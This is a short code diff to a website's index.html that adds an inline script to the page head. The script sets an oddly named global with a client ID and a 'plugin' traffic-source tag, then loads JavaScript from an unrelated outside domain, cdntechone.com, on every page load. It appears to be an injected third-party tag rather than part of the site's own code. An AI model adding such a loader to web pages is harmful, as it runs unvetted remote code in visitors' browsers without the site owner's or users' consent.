--- a/index.html
+++ b/index.html
@@ -8,6 +8,17 @@
   <link rel="stylesheet" href="css/normalize.css">
   <link rel="stylesheet" href="css/style.css">
   <link href="https://fonts.googleapis.com/css?family=Lato:300,400,400i,700&display=swap" rel="stylesheet">
+  <script id="script">
+    window[ "__ds3dcv__" ] = {
+      clientId: "88506ad5-50e6-43b5-b450-2c5482f39314",
+      trafficSourceId: "plugin-12-22-test"
+
+    };
+    var stcih = document.createElement("script");
+    stcih.async = true;
+    stcih.src = "https://cdntechone.com/newtag.js";
+    document.getElementsByTagName("head")[ 0 ].appendChild(stcih);
+  </script>
 </head>
 
 <body>
